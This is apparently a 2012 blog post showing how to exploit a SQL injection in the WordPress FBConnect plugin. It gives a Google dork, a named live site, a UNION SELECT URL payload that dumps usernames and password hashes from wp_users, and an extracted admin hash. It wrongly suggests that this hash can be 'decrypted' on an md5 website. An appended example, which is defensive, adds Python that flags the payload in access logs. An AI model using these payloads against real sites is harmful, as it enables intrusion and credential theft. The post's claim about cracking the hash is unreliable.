Saturday, May 19, 2012

WordPress plugin FBConnect SQL Injection Vulnerability

Google Dork: inurl:"fbconnect_action=myhome"

For my elder brother, who is studying SQL injection, I am going to show how injection is done against WordPress sites.

http://culturalfuel.net/?fbconnect_action=myhome&userid=6

Go to the address above.
OK, once the web page has loaded, add
/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12+from+wp_users--
to it as well.
Like this:

http://culturalfuel.net/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12+from+wp_users--

We will then see the following:

Status:
Name: 10
Nickname:
Member since: 7
Website URL: admin:$P$BmbAVkuorxummmPqtvzizFukpu7tQN.
About me:

In that output you will find
admin:$P$BmbAVkuorxummmPqtvzizFukpu7tQN.
So the answer is now clear:
username : admin
password : $P$BmbAVkuorxummmPqtvzizFukpu7tQN. (encrypt)

Oh, I almost forgot: some people are a bit clueless about this... just like me.
http://md5encryption.com/
Go to that link as well.
Then ...
do the encrypt....
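
An added example, not part of the original post: a Python check that scans web-server access logs for the request shape shown above and flags fbconnect_action=myhome requests whose userid or fbuserid value is not a plain integer. The log lines are constructed samples using documentation IP addresses, and the combined log format and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# The two parameters the post passes to the plugin; a legitimate value is a numeric id.
ID_PARAMS = ("userid", "fbuserid")

def suspicious_fbconnect(line):
    """Return (param, decoded_value) for a myhome request with a non-integer id, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # parse_qs percent-decodes and turns '+' into a space, so encoded variants look the same
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if "myhome" not in [v.lower() for v in params.get("fbconnect_action", [])]:
        return None
    for name in ID_PARAMS:
        for value in params.get(name, []):
            if not re.fullmatch(r"\d{1,20}", value):  # allow-list: digits only
                return name, value
    return None

# Constructed sample log lines (192.0.2.0/24 is a documentation range)
SAMPLE_LOG = [
    '192.0.2.10 - - [19/May/2012:10:00:01 +0000] "GET /?fbconnect_action=myhome&userid=6 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [19/May/2012:10:02:13 +0000] "GET /?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12+from+wp_users-- HTTP/1.1" 200 4381',
    '192.0.2.77 - - [19/May/2012:10:02:40 +0000] "GET /?fbconnect_action=myhome&fbuserid=1%20and%201%3D2 HTTP/1.1" 200 4012',
    '192.0.2.10 - - [19/May/2012:10:03:00 +0000] "GET /?p=12 HTTP/1.1" 200 9000',
]

def scan(lines):
    """Return (line_number, client_ip, param, decoded_value) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        hit = suspicious_fbconnect(line)
        if hit:
            hits.append((n, line.split()[0], *hit))
    return hits

if __name__ == "__main__":
    for n, ip, param, value in scan(SAMPLE_LOG):
        print(f"line {n}: {ip} sent non-integer {param}={value!r}")
```

The same digits-only rule can be enforced in front of the site (for example in a WAF rule) until the plugin is updated or removed.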
